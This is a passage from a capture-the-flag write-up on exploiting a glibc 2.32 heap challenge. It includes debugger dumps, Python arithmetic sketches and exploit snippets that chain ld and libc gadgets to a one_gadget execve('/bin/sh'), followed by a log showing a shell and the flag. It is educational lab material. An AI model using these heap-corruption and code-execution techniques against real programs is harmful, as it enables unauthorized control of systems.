$rdi : 0x0000555555558060 → 0x00007ffff7fc2520 → 0x00000000fbad2887
$rip : 0x00007ffff7fe16a4 → 0xff07034908408b48
$r8 : 0x2
$r9 : 0x1
$r10 : 0x00007ffff7f73ac0 → 0x0000000100000000
$r11 : 0x246
$r12 : 0x0
$r13 : 0x00007fffffffda80 → 0x00007ffff7ffe1a0 → 0x0000555555554000 → 0x00010102464c457f
$r14 : 0x0000555555557dd0 → 0x00005555555551c0 → <frame_dummy+0> endbr64
$r15 : 0x00007ffff7ffe1a0 → 0x0000555555554000 → 0x00010102464c457f
$eflags: [zero carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
───────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
0x7ffff7fe1698 mov rax, QWORD PTR [r15+0xa8]
0x7ffff7fe169f test rax, rax
0x7ffff7fe16a2 je 0x7ffff7fe16ad
●→ 0x7ffff7fe16a4 mov rax, QWORD PTR [rax+0x8]
0x7ffff7fe16a8 add rax, QWORD PTR [r15]
0x7ffff7fe16ab call rax
0x7ffff7fe16ad mov esi, DWORD PTR [rbp-0x3c]
0x7ffff7fe16b0 test esi, esi
0x7ffff7fe16b2 jne 0x7ffff7fe16c2
──────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007fffffffda80│+0x0000: 0x00007ffff7ffe1a0 → 0x0000555555554000 → 0x00010102464c457f ← $rsp, $r13
0x00007fffffffda88│+0x0008: 0x00007ffff7ffe750 → 0x00007ffff7fce000 → 0x00010102464c457f
0x00007fffffffda90│+0x0010: 0x00007ffff7fc8000 → 0x00007ffff7dff000 → 0x03010102464c457f
0x00007fffffffda98│+0x0018: 0x00007ffff7ffda08 → 0x00007ffff7fd0000 → 0x00010102464c457f
0x00007fffffffdaa0│+0x0020: 0x00007fffffffdaa0 → [loop detected]
0x00007fffffffdaa8│+0x0028: 0x00007fffffffdaa0 → 0x00007fffffffdaa0 → [loop detected]
This will now fetch the value from rax+0x8 and add the value at r15 (0x0000555555554000, which is the elf base) to it, and then call it.
We previously put 0xfacebabe there, so this would now call 0x55565023fabe. Not quite right, so let’s go back there and fix that value.
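The correction is plain modular arithmetic: the loader adds the elf base to whatever we store, so we have to subtract it beforehand. A minimal sketch with the ASLR-disabled base from the register dump (the function names are made up for illustration):

```python
MASK64 = (1 << 64) - 1
ELF_BASE = 0x555555554000  # value at [r15], the base of the main binary


def called_address(stored):
    # what "add rax, [r15]; call rax" ends up calling
    return (stored + ELF_BASE) & MASK64


def value_to_store(wanted):
    # pre-compensate for the base that will be added later
    return (wanted - ELF_BASE) & MASK64


print(hex(called_address(0xfacebabe)))        # the wrong target seen above
fixed = value_to_store(0x7ffffacebabe)
print(hex(called_address(fixed)))             # now lands where we want
```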
CALL = 0x7ffffacebabe
# overwrite free fd with ptr to pro plan again
adddesc(0x10, p64((PIE+0x40)^GUARD))
adddesc(0x10, p64(0xdeadbeef)+p64(0xcafebabe))
adddesc(0x10, p64(0xdeadbeef)+p64(CALL-(PIE-0x4080)))
$rax : 0x7ffffacebabe
$rbx : 0x00007ffff7ffd000 → 0x00007ffff7ffe1a0 → 0x0000555555554000 → 0x00010102464c457f
$rcx : 0x0
$rdx : 0x0000555555557dd8 → 0x0000555555555170 → <__do_global_dtors_aux+0> endbr64
$rsp : 0x00007fffffffda80 → 0x00007ffff7ffe1a0 → 0x0000555555554000 → 0x00010102464c457f
$rbp : 0x00007fffffffdaf0 → 0x0000000000000000
$rsi : 0x0
$rdi : 0x0000555555558060 → 0x00007ffff7fc2520 → 0x00000000fbad2887
$rip : 0x00007ffff7fe16ab → 0x75f685c4758bd0ff
$r8 : 0x2
$r9 : 0x1
$r10 : 0x00007ffff7f73ac0 → 0x0000000100000000
$r11 : 0x246
$r12 : 0x0
$r13 : 0x00007fffffffda80 → 0x00007ffff7ffe1a0 → 0x0000555555554000 → 0x00010102464c457f
$r14 : 0x0000555555557dd0 → 0x00005555555551c0 → <frame_dummy+0> endbr64
$r15 : 0x00007ffff7ffe1a0 → 0x0000555555554000 → 0x00010102464c457f
$eflags: [zero carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
──────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
0x7ffff7fe16a2 je 0x7ffff7fe16ad
● 0x7ffff7fe16a4 mov rax, QWORD PTR [rax+0x8]
0x7ffff7fe16a8 add rax, QWORD PTR [r15]
→ 0x7ffff7fe16ab call rax
0x7ffff7fe16ad mov esi, DWORD PTR [rbp-0x3c]
0x7ffff7fe16b0 test esi, esi
0x7ffff7fe16b2 jne 0x7ffff7fe16c2
0x7ffff7fe16b4 mov ecx, DWORD PTR [rip+0x1b046] # 0x7ffff7ffc700
0x7ffff7fe16ba test ecx, ecx
─────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007fffffffda80│+0x0000: 0x00007ffff7ffe1a0 → 0x0000555555554000 → 0x00010102464c457f ← $rsp, $r13
0x00007fffffffda88│+0x0008: 0x00007ffff7ffe750 → 0x00007ffff7fce000 → 0x00010102464c457f
0x00007fffffffda90│+0x0010: 0x00007ffff7fc8000 → 0x00007ffff7dff000 → 0x03010102464c457f
0x00007fffffffda98│+0x0018: 0x00007ffff7ffda08 → 0x00007ffff7fd0000 → 0x00010102464c457f
0x00007fffffffdaa0│+0x0020: 0x00007fffffffdaa0 → [loop detected]
0x00007fffffffdaa8│+0x0028: 0x00007fffffffdaa0 → 0x00007fffffffdaa0 → [loop detected]
Calling 0x7ffffacebabe… Seems we have rip control, yay…
But wait… None of the one_gadget constraints can be fulfilled, and also none of the registers point anywhere useful to maybe do some stack pivoting =(
0xcda5d execve("/bin/sh", r12, rdx)
constraints:
[r12] == NULL || r12 == NULL
[rdx] == NULL || rdx == NULL
This would have been a good candidate, since r12 is already 0x0, but rdx contains an address, thus we cannot use it (for now…).
Well, this took quite some time to come up with a solution for, but after wading through countless gadgets to make anything useful from the situation, I came up with this:
0x7ffff7f2cd44: mov rax,QWORD PTR [r15+0x60]
0x7ffff7f2cd48: call QWORD PTR [rax+0x8]
$r15 is pointing to the ld region we overwrote with our pro plan chunks.
gef➤ x/10gx 0x00007ffff7ffe1a0+0x60
0x7ffff7ffe200: 0x000055555555ee70 0x0000000000000020
0x7ffff7ffe210: 0x0000000000000000 0x000055555555d5c0
0x7ffff7ffe220: 0x0000000000000040 0x0000000000000000
0x7ffff7ffe230: 0x000055555555d610 0x0000000000000040
0x7ffff7ffe240: 0x0000000000000000 0x000055555555d5c0
gef➤ x/10gx 0x000055555555ee70
0x55555555ee70: 0x5a5a5a5a5a5a5a5a 0x00000000deadbeef
0x55555555ee80: 0x0000000000000000 0x0000000000000000
0x55555555ee90: 0x0000000000000000 0x0000000000000031
0x55555555eea0: 0x0000000000000041 0x0000000000000000
0x55555555eeb0: 0x0000000000000000 0x0000000000000000
So, yeah, that’s the reason, I put that chunk there previously (hard to explain this whole mess in the right order).
By using the above gadget, we can point rax to our chunk on the heap, and it will then jump to the address stored at rax+0x8 (which currently is 0xdeadbeef). Not quite there yet, but at least we have one more register containing an address that is under our control.
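The pointer chase of this gadget can be replayed on a tiny fake memory map. The dictionary below only contains the three qwords from the dumps that matter here; it is a sketch of the data flow, not an emulator.

```python
# address -> qword, copied from the ld and heap dumps
memory = {
    0x7ffff7ffe200: 0x55555555ee70,      # third placeholder entry in the ld region
    0x55555555ee70: 0x5a5a5a5a5a5a5a5a,  # "ZZZZZZZZ"
    0x55555555ee78: 0x00000000deadbeef,  # gadget placeholder
}

r15 = 0x7ffff7ffe1a0

# mov rax, QWORD PTR [r15+0x60]
rax = memory[r15 + 0x60]
# call QWORD PTR [rax+0x8]
call_target = memory[rax + 0x8]

print(hex(rax))
print(hex(call_target))
```

Replacing the 0xdeadbeef placeholder in that chunk therefore decides where execution continues, with rax still pointing at heap data we control.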
$rax : 0x000055555555ee70 → 0x5a5a5a5a5a5a5a5a ("ZZZZZZZZ"?)
$rbx : 0x00007ffff7ffd000 → 0x00007ffff7ffe1a0 → 0x0000555555554000 → 0x00010102464c457f
$rcx : 0x0
$rdx : 0x0000555555557dd8 → 0x0000555555555170 → <__do_global_dtors_aux+0> endbr64
$rsp : 0x00007fffffffda70 → 0x00007ffff7f2cd4b → 0x0000059a840fc085
$rbp : 0x00007fffffffdaf0 → 0x0000000000000000
$rsi : 0x0
$rdi : 0x0000555555558060 → 0x00007ffff7fc2520 → 0x00000000fbad2887
$rip : 0xdeadbeef
$r8 : 0x2
$r9 : 0x1
$r10 : 0x00007ffff7f73ac0 → 0x0000000100000000
$r11 : 0x246
$r12 : 0x0
$r13 : 0x00007fffffffda80 → 0x00007ffff7ffe1a0 → 0x0000555555554000 → 0x00010102464c457f
$r14 : 0x0000555555557dd0 → 0x00005555555551c0 → <frame_dummy+0> endbr64
$r15 : 0x00007ffff7ffe1a0 → 0x0000555555554000 → 0x00010102464c457f
$eflags: [zero carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
───────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
[!] Cannot disassemble from $PC
─────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007fffffffda70│+0x0000: 0x00007ffff7f2cd4b → 0x0000059a840fc085 ← $rsp
0x00007fffffffda78│+0x0008: 0x00007ffff7fe16ad → 0x8b0e75f685c4758b
0x00007fffffffda80│+0x0010: 0x00007ffff7ffe1a0 → 0x0000555555554000 → 0x00010102464c457f ← $r13
0x00007fffffffda88│+0x0018: 0x00007ffff7ffe750 → 0x00007ffff7fce000 → 0x00010102464c457f
0x00007fffffffda90│+0x0020: 0x00007ffff7fc8000 → 0x00007ffff7dff000 → 0x03010102464c457f
0x00007fffffffda98│+0x0028: 0x00007ffff7ffda08 → 0x00007ffff7fd0000 → 0x00010102464c457f
[!] Cannot access memory at address 0xdeadbeef
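To make the indirect jump concrete, here is a small sketch that rebuilds the first two qwords of the chunk from the dump above and reads the value the gadget jumps through. The `chunk` buffer and the `read_qword` helper are illustrative names only, they are not part of the exploit script.

```python
import struct

RAX = 0x55555555ee70  # heap chunk address held in rax (taken from the dump above)

# First two qwords of the chunk, exactly as shown by x/10gx.
chunk = struct.pack("<QQ", 0x5a5a5a5a5a5a5a5a, 0x00000000deadbeef)

def read_qword(base, image, addr):
    """Hypothetical helper: little-endian qword stored at addr inside image."""
    return struct.unpack_from("<Q", image, addr - base)[0]

# The gadget jumps to the address *stored at* rax+0x8, not to rax+0x8 itself.
target = read_qword(RAX, chunk, RAX + 0x8)
print(hex(target))  # 0xdeadbeef
```

Whatever we write into the second qword of that chunk therefore becomes the next value of rip.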
Still, we just went from one crash to another…
But since the jump target is now under our control, we can branch into another gadget:
0x7ffff7e7a4c7: mov rdx,QWORD PTR [rbx+0x40]
0x7ffff7e7a4cb: mov rdi,rbx
0x7ffff7e7a4ce: sub rdx,rsi
0x7ffff7e7a4d1: call QWORD PTR [rax+0x70]
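# rax+0x0: 8 bytes of padding, rax+0x8: address of the second gadget (libc offset 0x7b4c7)
payload = "Z"*8 + p64(libc.address+0x000000000007b4c7)
# store it in the fake endorsement chunk that rax points to
addfake(20, payload)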
When executing this payload, we land in the new gadget:
$rax : 0x000055555555ee70 → 0x5a5a5a5a5a5a5a5a ("ZZZZZZZZ"?)
$rbx : 0x00007ffff7ffd000 → 0x00007ffff7ffe1a0 → 0x0000555555554000 → 0x00010102464c457f
$rcx : 0x0
$rdx : 0x0000555555557dd8 → 0x0000555555555170 → <__do_global_dtors_aux+0> endbr64
$rsp : 0x00007fffffffda70 → 0x00007ffff7f2cd4b → 0x0000059a840fc085
$rbp : 0x00007fffffffdaf0 → 0x0000000000000000
$rsi : 0x0
$rdi : 0x0000555555558060 → 0x00007ffff7fc2520 → 0x00000000fbad2887
$rip : 0x00007ffff7e7a4c7 → 0x48df894840538b48
$r8 : 0x2
$r9 : 0x1
$r10 : 0x00007ffff7f73ac0 → 0x0000000100000000
$r11 : 0x246
$r12 : 0x0
$r13 : 0x00007fffffffda80 → 0x00007ffff7ffe1a0 → 0x0000555555554000 → 0x00010102464c457f
$r14 : 0x0000555555557dd0 → 0x00005555555551c0 → <frame_dummy+0> endbr64
$r15 : 0x00007ffff7ffe1a0 → 0x0000555555554000 → 0x00010102464c457f
$eflags: [zero carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
0x7ffff7e7a4ba cmp rdx, r13
0x7ffff7e7a4bd jae 0x7ffff7e7a718
0x7ffff7e7a4c3 mov rsi, QWORD PTR [rbx+0x10]
→ 0x7ffff7e7a4c7 mov rdx, QWORD PTR [rbx+0x40]
0x7ffff7e7a4cb mov rdi, rbx
0x7ffff7e7a4ce sub rdx, rsi
0x7ffff7e7a4d1 call QWORD PTR [rax+0x70]
0x7ffff7e7a4d4 test rax, rax
0x7ffff7e7a4d7 jle 0x7ffff7e7a6b0
──────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007fffffffda70│+0x0000: 0x00007ffff7f2cd4b → 0x0000059a840fc085 ← $rsp
0x00007fffffffda78│+0x0008: 0x00007ffff7fe16ad → 0x8b0e75f685c4758b
0x00007fffffffda80│+0x0010: 0x00007ffff7ffe1a0 → 0x0000555555554000 → 0x00010102464c457f ← $r13
0x00007fffffffda88│+0x0018: 0x00007ffff7ffe750 → 0x00007ffff7fce000 → 0x00010102464c457f
0x00007fffffffda90│+0x0020: 0x00007ffff7fc8000 → 0x00007ffff7dff000 → 0x03010102464c457f
0x00007fffffffda98│+0x0028: 0x00007ffff7ffda08 → 0x00007ffff7fd0000 → 0x00010102464c457f
gef➤ x/gx $rbx+0x40
0x7ffff7ffd040: 0x0000000000000000
This will now move the value at rbx+0x40 (0x0) into rdx, subtract rsi (also 0x0) from it, and then call the address stored at rax+0x70. So, this effectively zeroes out rdx, and we fulfill the constraints for the one_gadget from above (r12 == 0 && rdx == 0).
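The effect of this gadget can be modelled in a few lines of Python. This is only a sketch: the register values are copied from the gef output above, `run_gadget` is a made-up helper name, and the memory dict contains just the single qword that was inspected with `x/gx $rbx+0x40`.

```python
MASK64 = 0xFFFFFFFFFFFFFFFF

def run_gadget(regs, mem):
    """Model the four instructions of the second gadget on a register dict."""
    regs = dict(regs)
    regs["rdx"] = mem[regs["rbx"] + 0x40]                 # mov rdx, [rbx+0x40]
    regs["rdi"] = regs["rbx"]                             # mov rdi, rbx
    regs["rdx"] = (regs["rdx"] - regs["rsi"]) & MASK64    # sub rdx, rsi
    call_slot = regs["rax"] + 0x70                        # call [rax+0x70]
    return regs, call_slot

# Register state on entry to the gadget (from the context dump above).
regs = {
    "rax": 0x55555555ee70,
    "rbx": 0x7ffff7ffd000,
    "rdx": 0x555555557dd8,
    "rsi": 0x0,
    "r12": 0x0,
}
mem = {0x7ffff7ffd040: 0x0}  # value at rbx+0x40

after, call_slot = run_gadget(regs, mem)
print(after["rdx"] == 0 and after["r12"] == 0)  # True
print(hex(call_slot))                           # 0x55555555eee0

# The payload constant is the gadget's offset inside libc: subtracting it
# from the address in the disassembly gives the local libc base.
print(hex(0x7ffff7e7a4c7 - 0x7b4c7))            # 0x7ffff7dff000
```

So after the gadget both constraints hold, and the qword at 0x55555555eee0 (rax+0x70) decides where execution continues.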
Remember that I previously put the one_gadget address in one of the fake chunks? Surprise, it's now exactly at rax+0x70…
Finally at the end of the journey :)
$ python xpl.py 1
[*] '/home/kileak/ctf/lake/nilework/libc-2.32.so'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Opening connection to chall.polygl0ts.ch on port 3800: Done
[*] LEAK : 0x55a9f31a0b09
[*] HEAP : 0x55aca9d09600
[*] HEAP guard : 0x55aca9d09
[*] LIBC leak : 0x7fb8f7cafa60
[*] LIBC : 0x7fb8f7aed000
[*] MAIN_ARENA : 0x7fb8f7cafa00
[*] PIE : 0x55aca8ac2080
[*] TARGET CHUNK : 0x7fb8f7ce61d0
[*] Paused (press any to continue)
[*] Switching to interactive mode
Goodbye! Thank you for using Nile.
$ ls
flag
ld-2.32.so
libc-2.32.so
run
$ cat flag
EPFL{Y3t_4n0th3r_h34pn0t3_th4t_w4s_1n_my_chall3ng3s_f0lder_f0r_t00_l0ng}
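As a sanity check, the heap values in the log above are consistent with the safe-linking scheme of glibc 2.32, where a stored pointer is XORed with its storage address shifted right by 12 bits. The sketch below assumes that the leaked value is such a mangled pointer and that it lives in the same page it points into (the numbers support that assumption); `demangle` is an illustrative helper, not necessarily how xpl.py computes it.

```python
def demangle(leak, rounds=6):
    """Recover ptr from leak = ptr ^ (ptr >> 12).

    Only valid when the pointer and the slot it is stored in share the
    same page. Each round fixes 12 more bits, starting from the top.
    """
    ptr = 0
    for _ in range(rounds):
        ptr = leak ^ (ptr >> 12)
    return ptr

# Values taken from the exploit output above.
LEAK = 0x55a9f31a0b09
HEAP = 0x55aca9d09600
HEAP_GUARD = 0x55aca9d09

print(HEAP >> 12 == HEAP_GUARD)   # True
print(LEAK ^ HEAP_GUARD == HEAP)  # True
print(hex(demangle(LEAK)))        # 0x55aca9d09600
```

The "HEAP guard" value is simply the heap address shifted right by 12 bits, which is the key needed to mangle forged pointers later on.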
Phew, this challenge took a lot of time, with me going down so many rabbit holes and redoing the code execution part again and again. Though I was cursing a LOT in the middle of the night, in hindsight I enjoyed the challenge quite a lot.
Still, I'm quite curious about other people's solutions, to see if it can be solved in an easier way, since this one was definitely a real pain.